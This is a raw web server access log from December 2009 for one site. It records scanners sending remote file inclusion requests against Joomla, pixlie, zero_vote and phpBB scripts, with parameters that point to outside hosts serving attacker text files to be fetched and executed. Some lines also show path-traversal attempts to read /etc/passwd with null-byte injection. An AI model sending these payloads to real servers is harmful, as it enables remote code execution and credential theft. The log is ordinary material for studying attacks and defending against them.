209.92.156.53 - - [13/Dec/2009:08:48:35 -0800] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:48:35 -0800] "GET /logs/access_080513.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:48:40 -0800] "GET /logs/access_080912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:49:48 -0800] "GET /logs/access_080513.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
209.92.156.53 - - [13/Dec/2009:08:49:51 -0800] "GET /logs/access_080912.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://bethdodd.com/copyright/media/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:08:50:19 -0800] "GET /logs/access_080425.log//bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
82.195.252.206 - - [13/Dec/2009:08:50:39 -0800] "GET /logs/access_081105.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://indoadvertise.com/1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.9.234 - - [13/Dec/2009:08:51:00 -0800] "GET /logs/access_090521.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:35 -0800] "GET /logs/access_081231.log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:35 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:39 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 14944 "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:40 -0800] "GET /logs/access_081231.log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:41 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:41 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 200 14943 "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:48 -0800] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:48 -0800] "GET /logs/access_080603.log%20%20/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:49 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:50 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:51 -0800] "GET /joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:51 -0800] "GET /logs/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:51 -0800] "GET /logs/access_080530.log%20%20/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:53:56 -0800] "GET /logs/access_080531.log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:53:58 -0800] "GET /logs/access_080603.log%20%20/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:54:05 -0800] "GET /logs/access_080531.log//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:54:41 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:54:46 -0800] "GET /logs/access_080603.log/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:54:49 -0800] "GET /logs/access_080530.log/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.174.0.38 - - [13/Dec/2009:08:54:55 -0800] "GET /logs/access_080603.log/joomla/index.php?option=com_restaurante&task=http://n34.biz/.gudang/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.9.234 - - [13/Dec/2009:08:56:16 -0800] "GET /logs/access_090827.log/components/com_slideshow/admin.slideshow1.php?mosConfig_live_site=http://standalonesociety.com//modules/Forums/admin/bash/logs/baner.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:56:37 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:56:37 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:56:37 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:56:52 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:56:52 -0800] "GET /logs//pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:56:52 -0800] "GET /pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:57:02 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:57:17 -0800] "GET /logs/access_081231.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:57:17 -0800] "GET /logs/access_080531.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:57:17 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:57:29 -0800] "GET /logs/access_081231.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
189.30.242.61 - - [13/Dec/2009:08:57:30 -0800] "GET /logs/access_080531.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://www.usher.co.kr/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.191.166.24 - - [13/Dec/2009:08:57:32 -0800] "GET /logs//include/write.php?dir=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.191.166.24 - - [13/Dec/2009:08:57:32 -0800] "GET /logs/access_091203.log//include/write.php?dir=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.191.166.24 - - [13/Dec/2009:08:57:33 -0800] "GET /include/write.php?dir=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.191.166.24 - - [13/Dec/2009:08:57:35 -0800] "GET /logs/access_080512.log//include/write.php?dir=http://gayivf.rscnewengland.com/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:57:37 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:57:46 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:57:46 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:57:46 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
69.72.202.238 - - [13/Dec/2009:08:57:50 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:08:57:53 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:08:57:53 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:08:57:56 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:58:06 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:58:11 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
70.86.34.18 - - [13/Dec/2009:08:58:14 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://esboxvps.com/unix1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:08:58:43 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:08:58:44 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:08:58:44 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:08:58:44 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET /logs/access_080116.log///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET /logs///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET //skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:08:58:53 -0800] "GET /logs/access_080116.log///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:58:56 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.120.225.13 - - [13/Dec/2009:08:59:04 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
195.225.106.11 - - [13/Dec/2009:08:59:11 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:08:59:28 -0800] "GET /logs///include/mail.inc.php?skin_board_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:08:59:28 -0800] "GET //include/mail.inc.php?skin_board_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:08:59:28 -0800] "GET /logs/access_080619.log%20%20///include/mail.inc.php?skin_board_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
93.190.41.101 - - [13/Dec/2009:08:59:32 -0800] "GET /logs/access_090814.log%20%20///include/mail.inc.php?skin_board_path=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/v5_4id1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:08:59:34 -0800] "GET /logs/access_080702.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:08:59:34 -0800] "GET /viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [13/Dec/2009:08:59:34 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.greatlakesbikiniblast.com/pnTemp/Xanthia_Temp/id.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
174.37.165.86 - - [13/Dec/2009:08:59:45 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:08:59:48 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:08:59:48 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:08:59:48 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:08:59:54 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:08:59:54 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:08:59:54 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:09:00:06 -0800] "GET /logs/access_090419.log///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
193.111.95.42 - - [13/Dec/2009:09:00:06 -0800] "GET /logs/access_090419.log///skin/zero_vote/ask_password.php?dir=http://www.sudsalentocultura.it/mail/idxx.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [13/Dec/2009:09:00:10 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:00:11 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14981 "-" "libwww-perl/5.79" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:00:23 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:00:35 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:00:37 -0800] "GET /logs/access_090429.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:00:37 -0800] "GET /logs//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:00:37 -0800] "GET /pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:01:46 -0800] "GET /logs/access_081130.log//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:03:01 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:03:39 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
200.175.235.72 - - [13/Dec/2009:09:03:48 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
203.82.73.198 - - [13/Dec/2009:09:04:30 -0800] "GET /logs/access_080517.log HTTP/1.1" 200 786432 "http://www.dmulk.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:04:31 -0800] "GET ////?_SERVER[DOCUMENT_ROOT]=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14981 "-" "libwww-perl/5.79" "www.dmulk.com"
110.45.147.248 - - [13/Dec/2009:09:04:32 -0800] "GET ////////?cmd&file=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 200 14968 "-" "libwww-perl/5.79" "www.dmulk.com"
60.251.165.181 - - [13/Dec/2009:09:04:54 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:09:06:20 -0800] "GET /logs/access_090513.log%20%20///bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:09:06:23 -0800] "GET /logs/access_090513.log%20%20///bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:09:06:42 -0800] "GET /logs/access_080305.log%20%20///bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:09:06:46 -0800] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:09:06:46 -0800] "GET /logs/access_091203.log//skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
218.234.21.178 - - [13/Dec/2009:09:06:46 -0800] "GET /skin/zero_vote/ask_password.php?dir=http://www.dong69.co.kr//xe/common/den/pinkid1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
213.171.225.234 - - [13/Dec/2009:09:06:58 -0800] "GET /logs/access_080305.log%20%20///bbs//skin/zero_vote/setup.php?dir=http://www.jjdd.co.kr/nalog/plug_in_config/pro/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:09:07:14 -0800] "GET /logs/access_080408.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:09:07:14 -0800] "GET /logs//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 130080 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:09:07:16 -0800] "GET /?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 200 14938 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.42 - - [13/Dec/2009:09:07:17 -0800] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.6; http://dmulk.com/blog" "dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:20 -0800] "GET /logs/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:20 -0800] "GET /logs/access_090510.log%20%20/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:20 -0800] "GET /index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 200 14824 "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:26 -0800] "GET /logs/access_090510.log%20%20/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:26 -0800] "GET /logs/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:26 -0800] "GET /index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 200 14824 "-" "Mozilla/5.0" "www.dmulk.com"
64.34.111.74 - - [13/Dec/2009:09:07:30 -0800] "GET /logs/access_090523.log%20%20//?_SERVER[DOCUMENT_ROOT]=http://honda1.fileave.com/zfxid1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:34 -0800] "GET /logs/access_080607.log%20%20/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
75.119.205.12 - - [13/Dec/2009:09:07:41 -0800] "GET /logs/access_080607.log%20%20/index.php?menu=deti&page=http://www.homehealthgraphics.com/uploads/pid1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:08:05 -0800] "GET /logs/access_090429.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
146.164.54.5 - - [13/Dec/2009:09:08:35 -0800] "GET /logs/access_081130.log%20%20//pixlie/pixlie.php?root=http://74.86.30.186/~fjearone/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.dmulk.com"
